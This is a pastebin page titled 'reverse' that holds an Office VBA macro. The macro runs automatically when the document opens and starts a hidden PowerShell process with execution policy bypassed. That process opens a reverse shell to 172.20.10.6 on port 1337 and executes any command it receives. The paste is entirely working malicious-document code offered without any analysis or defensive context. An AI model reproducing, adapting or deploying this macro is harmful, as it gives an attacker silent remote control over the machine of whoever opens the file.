PPaste!

reverse

Home - All the pastes - Authored by Thooms

Raw version

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
Sub AutoOpen()
    RunPSInline
End Sub

Sub Document_Open()
    RunPSInline
End Sub


Sub RunPSInline()
    Dim objShell As Object
    Dim psCode As String
    Dim cmd As String

    psCode = "do{Start-Sleep -Seconds 1;try{$TCPClient = New-Object Net.Sockets.TCPClient('172.20.10.6', 1337)} catch {}}until ($TCPClient.Connected);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) { [byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0} ; $StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush();};WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String};WriteToStream ($Output)};$StreamWriter.Close()"
    cmd = "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command " & Chr(34) & psCode & Chr(34)
    
    Set objShell = CreateObject("WScript.Shell")
    objShell.Run cmd, 0, False
End Sub